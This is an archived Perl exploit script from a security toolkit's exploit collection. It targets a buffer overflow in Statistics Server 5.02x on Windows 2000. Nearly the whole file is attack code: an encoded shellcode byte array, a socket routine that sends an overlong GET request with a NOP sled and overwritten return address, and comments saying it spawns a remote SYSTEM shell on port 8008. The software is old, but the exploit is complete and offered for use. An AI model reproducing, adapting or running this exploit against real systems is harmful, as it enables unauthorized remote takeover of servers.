home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webapp / statisticsserver / ssploit502x.pl < prev   
Encoding:
Perl Script  |  2005-02-12  |  10.1 KB  |  223 lines
  1. #!/usr/bin/perl -w
  2. # Statistics Server 5.02x's exploit. 
  3. # usage: ./ssexploit502x.pl hostname port
  4. # 00/08/10
  5. # http://www.deepzone.org
  6. # http://deepzone.cjb.net       
  7. # http://mareasvivas.cjb.net  (|Zan homepage)
  8. #
  9. # --|Zan <izan@deepzone.org>
  10. # ----------------------------------------------------------------
  11. #
  12. # This exploit works against Statistics Server 5.02x/Win2k.
  13. #
  14. # Tested with Win2k (spanish version).
  15. #
  16. # It spawns a remote winshell on 8008 port. It doesn't kill
  17. # webserver so webserver continues running while hack is made.
  18. # When hack is finished webserver will run perfectly too.
  19. #
  20. # Default installation gives us a remote shell with system
  21. # privileges.
  22. #
  23. # overflow discovered by
  24. # -- Nemo <nemo@deepzone.org>
  25. #
  26. # exploit coded by
  27. # -- |Zan <izan@deepzone.org>
  28. #
  29. # ----------------------------------------------------------------
  30.  
  31. use IO::Socket;
  32.  
  33.  
  34. @crash = (
  35. "\x68","\x8b","\x41","\x1d","\x01","\x68","\x41","\x41","\x41",
  36. "\x41","\x68","\x61","\x41","\x41","\x41","\x58","\x59","\x5f",
  37. "\x2b","\xc1","\xaa","\x33","\xc9","\x66","\xb9","\x71","\x04",
  38. "\x90","\x90","\x90","\x68","\xbd","\x3e","\x1d","\x01","\x5e",
  39. "\x56","\x5f","\x33","\xd2","\x80","\xc2","\x99","\xac","\x32",
  40. "\xc2","\xaa","\xe2","\xfa","\x71","\x99","\x99","\x99","\x99",
  41. "\xc4","\x18","\x74","\xaf","\x89","\xd9","\x99","\x14","\x2c",
  42. "\xd4","\x8a","\xd9","\x99","\x14","\x24","\xcc","\x8a","\xd9",
  43. "\x99","\xf3","\x9e","\x09","\x09","\x09","\x09","\xc0","\x71",
  44. "\x4b","\x9b","\x99","\x99","\x14","\x2c","\x1c","\x8a","\xd9",
  45. "\x99","\x14","\x24","\x17","\x8a","\xd9","\x99","\xf3","\x93",
  46. "\x09","\x09","\x09","\x09","\xc0","\x71","\x23","\x9b","\x99",
  47. "\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d","\xd9","\x99",
  48. "\xcf","\x14","\x2c","\x87","\x8d","\xd9","\x99","\xcf","\x14",
  49. "\x2c","\xbb","\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x17",
  50. "\x8a","\xd9","\x99","\xf3","\x99","\x14","\x2c","\x8b","\x8d",
  51. "\xd9","\x99","\xcf","\x14","\x2c","\xbf","\x8d","\xd9","\x99",
  52. "\xcf","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\xcf","\x66",
  53. "\x0c","\x17","\x8a","\xd9","\x99","\x5e","\x1c","\xb7","\x8d",
  54. "\xd9","\x99","\xdd","\x99","\x99","\x99","\x14","\x2c","\xb7",
  55. "\x8d","\xd9","\x99","\xcf","\x66","\x0c","\x0b","\x8a","\xd9",
  56. "\x99","\x14","\x2c","\xff","\x8d","\xd9","\x99","\x34","\xc9",
  57. "\x66","\x0c","\x37","\x8a","\xd9","\x99","\x14","\x2c","\xf3",
  58. "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x37","\x8a",
  59. "\xd9","\x99","\x14","\x2c","\xb3","\x8d","\xd9","\x99","\x14",
  60. "\x24","\xff","\x8d","\xd9","\x99","\x3c","\x14","\x2c","\x87",
  61. "\x8d","\xd9","\x99","\x34","\x14","\x24","\xf3","\x8d","\xd9",
  62. "\x99","\x32","\x14","\x24","\xf7","\x8d","\xd9","\x99","\x32",
  63. "\x5e","\x1c","\xc7","\x8d","\xd9","\x99","\x99","\x99","\x99",
  64. "\x99","\x5e","\x1c","\xc3","\x8d","\xd9","\x99","\x98","\x98",
  65. "\x99","\x99","\x14","\x2c","\xeb","\x8d","\xd9","\x99","\xcf",
  66. "\x14","\x2c","\xb7","\x8d","\xd9","\x99","\xcf","\xf3","\x99",
  67. "\xf3","\x99","\xf3","\x89","\xf3","\x98","\xf3","\x99","\xf3",
  68. "\x99","\x14","\x2c","\x1b","\x8d","\xd9","\x99","\xcf","\xf3",
  69. "\x99","\x66","\x0c","\x0f","\x8a","\xd9","\x99","\xf1","\x99",
  70. "\xb9","\x99","\x99","\x09","\xf1","\x99","\x9b","\x99","\x99",
  71. "\x66","\x0c","\x07","\x8a","\xd9","\x99","\x10","\x1c","\x13",
  72. "\x8d","\xd9","\x99","\xaa","\x59","\xc9","\xd9","\xc9","\xd9",
  73. "\xc9","\x66","\x0c","\xcc","\x8a","\xd9","\x99","\xc9","\xc2",
  74. "\xf3","\x89","\x14","\x2c","\x9b","\x8d","\xd9","\x99","\xcf",
  75. "\xca","\x66","\x0c","\xc0","\x8a","\xd9","\x99","\xf3","\x9a",
  76. "\xca","\x66","\x0c","\xc4","\x8a","\xd9","\x99","\x14","\x2c",
  77. "\x17","\x8d","\xd9","\x99","\xcf","\x14","\x2c","\x9b","\x8d",
  78. "\xd9","\x99","\xcf","\xca","\x66","\x0c","\xf8","\x8a","\xd9",
  79. "\x99","\x14","\x24","\x0b","\x8d","\xd9","\x99","\x32","\xaa",
  80. "\x59","\xc9","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
  81. "\xc9","\xc9","\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99",
  82. "\x34","\xc9","\x66","\x0c","\x03","\x8a","\xd9","\x99","\xf3",
  83. "\xa9","\x66","\x0c","\x33","\x8a","\xd9","\x99","\x72","\xd4",
  84. "\x09","\x09","\x09","\xaa","\x59","\xc9","\x14","\x24","\x07",
  85. "\x8d","\xd9","\x99","\xce","\xc9","\xc9","\xc9","\x14","\x2c",
  86. "\xbb","\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03",
  87. "\x8a","\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a",
  88. "\xd9","\x99","\x1a","\x24","\x07","\x8d","\xd9","\x99","\x9b",
  89. "\x96","\x1b","\x8e","\x98","\x99","\x99","\x18","\x24","\x07",
  90. "\x8d","\xd9","\x99","\x98","\xb9","\x99","\x99","\xeb","\x97",
  91. "\x09","\x09","\x09","\x09","\x5e","\x1c","\x07","\x8d","\xd9",
  92. "\x99","\x99","\xb9","\x99","\x99","\xf3","\x99","\x12","\x1c",
  93. "\x07","\x8d","\xd9","\x99","\x14","\x24","\x07","\x8d","\xd9",
  94. "\x99","\xce","\xc9","\x12","\x1c","\x13","\x8d","\xd9","\x99",
  95. "\xc9","\x14","\x2c","\xbb","\x8d","\xd9","\x99","\x34","\xc9",
  96. "\x66","\x0c","\x3b","\x8a","\xd9","\x99","\xf3","\xa9","\x66",
  97. "\x0c","\x33","\x8a","\xd9","\x99","\x12","\x1c","\x07","\x8d",
  98. "\xd9","\x99","\xf3","\x99","\xc9","\x14","\x2c","\x13","\x8d",
  99. "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
  100. "\x99","\x34","\xc9","\x66","\x0c","\xfc","\x8a","\xd9","\x99",
  101. "\xf3","\x99","\x14","\x24","\x07","\x8d","\xd9","\x99","\xce",
  102. "\xf3","\x99","\xf3","\x99","\xf3","\x99","\x14","\x2c","\xbb",
  103. "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x03","\x8a",
  104. "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
  105. "\x99","\xaa","\x50","\xa0","\x14","\x07","\x8d","\xd9","\x99",
  106. "\x96","\x1e","\xfe","\x66","\x66","\x66","\xf3","\x99","\xf1",
  107. "\x99","\xb9","\x99","\x99","\x09","\x14","\x2c","\x13","\x8d",
  108. "\xd9","\x99","\x34","\xc9","\x14","\x2c","\x0b","\x8d","\xd9",
  109. "\x99","\x34","\xc9","\x66","\x0c","\xf0","\x8a","\xd9","\x99",
  110. "\x10","\x1c","\x03","\x8d","\xd9","\x99","\xf3","\x99","\x14",
  111. "\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x14","\x2c",
  112. "\x13","\x8d","\xd9","\x99","\x34","\xc9","\x14","\x2c","\xbf",
  113. "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3f","\x8a",
  114. "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
  115. "\x99","\xf3","\x99","\x12","\x1c","\x03","\x8d","\xd9","\x99",
  116. "\x14","\x24","\x07","\x8d","\xd9","\x99","\xce","\xc9","\x12",
  117. "\x1c","\x13","\x8d","\xd9","\x99","\xc9","\x14","\x2c","\xbb",
  118. "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\x3b","\x8a",
  119. "\xd9","\x99","\xf3","\xa9","\x66","\x0c","\x33","\x8a","\xd9",
  120. "\x99","\x70","\x90","\x67","\x66","\x66","\x14","\x2c","\x0b",
  121. "\x8d","\xd9","\x99","\x34","\xc9","\x66","\x0c","\xf4","\x8a",
  122. "\xd9","\x99","\x14","\x2c","\x0f","\x8d","\xd9","\x99","\x34",
  123. "\xc9","\x66","\x0c","\xf4","\x8a","\xd9","\x99","\xf3","\x99",
  124. "\x66","\x0c","\x2b","\x8a","\xd9","\x99","\xc8","\xcf","\xf1",
  125. "\x6d","\x39","\xdc","\x99","\xc3","\x66","\x8b","\xc9","\xc2",
  126. "\xc0","\xce","\xc7","\xc8","\xcf","\xca","\xf1","\xe5","\x38",
  127. "\xdc","\x99","\xc3","\x66","\x8b","\xc9","\x35","\x1d","\x59",
  128. "\xec","\x62","\xc1","\x32","\xc0","\x7b","\x73","\x5a","\xce",
  129. "\xca","\xd6","\xda","\xd2","\xaa","\xab","\x99","\xea","\xf6",
  130. "\xfa","\xf2","\xfc","\xed","\x99","\xfb","\xf0","\xf7","\xfd",
  131. "\x99","\xf5","\xf0","\xea","\xed","\xfc","\xf7","\x99","\xf8",
  132. "\xfa","\xfa","\xfc","\xe9","\xed","\x99","\xea","\xfc","\xf7",
  133. "\xfd","\x99","\xeb","\xfc","\xfa","\xef","\x99","\xfa","\xf5",
  134. "\xf6","\xea","\xfc","\xea","\xf6","\xfa","\xf2","\xfc","\xed",
  135. "\x99","\xd2","\xdc","\xcb","\xd7","\xdc","\xd5","\xaa","\xab",
  136. "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xf0",
  137. "\xe9","\xfc","\x99","\xde","\xfc","\xed","\xca","\xed","\xf8",
  138. "\xeb","\xed","\xec","\xe9","\xd0","\xf7","\xff","\xf6","\xd8",
  139. "\x99","\xda","\xeb","\xfc","\xf8","\xed","\xfc","\xc9","\xeb",
  140. "\xf6","\xfa","\xfc","\xea","\xea","\xd8","\x99","\xc9","\xfc",
  141. "\xfc","\xf2","\xd7","\xf8","\xf4","\xfc","\xfd","\xc9","\xf0",
  142. "\xe9","\xfc","\x99","\xde","\xf5","\xf6","\xfb","\xf8","\xf5",
  143. "\xd8","\xf5","\xf5","\xf6","\xfa","\x99","\xcb","\xfc","\xf8",
  144. "\xfd","\xdf","\xf0","\xf5","\xfc","\x99","\xce","\xeb","\xf0",
  145. "\xed","\xfc","\xdf","\xf0","\xf5","\xfc","\x99","\xca","\xf5",
  146. "\xfc","\xfc","\xe9","\x99","\xda","\xf5","\xf6","\xea","\xfc",
  147. "\xd1","\xf8","\xf7","\xfd","\xf5","\xfc","\x99","\xdc","\xe1",
  148. "\xf0","\xed","\xcd","\xf1","\xeb","\xfc","\xf8","\xfd","\x99",
  149. "\x9b","\x99","\x86","\xd1","\x99","\x99","\x99","\x99","\x99",
  150. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x95","\x99",
  151. "\x99","\x99","\x99","\x99","\x99","\x99","\x98","\x99","\x99",
  152. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
  153. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
  154. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
  155. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
  156. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
  157. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
  158. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
  159. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
  160. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
  161. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
  162. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
  163. "\x99","\x99","\xda","\xd4","\xdd","\xb7","\xdc","\xc1","\xdc",
  164. "\x99","\x99","\x99","\x99","\x99","\x89","\x99","\x99","\x99",
  165. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x99",
  166. "\x99","\x99","\x99","\x99","\x99","\x99","\x99","\x90","\x90");
  167.  
  168. # -------------------------------------------------------------------
  169.  
  170. sub pcommands
  171. {
  172.     die "usage: $0 hostname port\n" if (@ARGV != 2);
  173.     ($host) = shift @ARGV;
  174.     ($port) = shift @ARGV;
  175. }
  176.  
  177. sub show_credits
  178. {
  179.     print "\n\n\t (c) 2000 Deep Zone - Statistics Server 5.02x's exploit\n";
  180.     print "\n\t\t  Coded by |Zan - izan\@deepzone.org\n";
  181.     print "\n\t-=[ http://www.deepzone.org - http://deepzone.cjb.net ]=-\n\n";
  182. }
  183.  
  184. sub bofit
  185. {
  186.  
  187.     print "\nspawning remote shell on port 8008 ...\n\n";
  188.  
  189.     $s = IO::Socket::INET->new(PeerAddr=>$host,
  190.                                    PeerPort=>$port,
  191.                    Proto=>"tcp");
  192.  
  193.     if(!$s) { die "error.\n"; }    
  194.  
  195.     print $s "GET http://O";
  196.  
  197.     foreach $item (@crash) {
  198.             print $s $item
  199.               } 
  200.  
  201.     for ($cont=0; $cont<840;$cont++) {
  202.         print $s "\x90"
  203.               }
  204.  
  205.     print $s "\x8c\x3e\x1d\x01";
  206.  
  207.     print $s "\r\n\r\n";
  208.  
  209.     while (<$s>) { print }
  210.  
  211.     print "... done.\n\n";
  212.  
  213. }
  214.  
  215. # ----- begin
  216.  
  217. show_credits;
  218. pcommands;
  219. bofit;
  220.  
  221. # ----- that's all :)
  222.  
  223.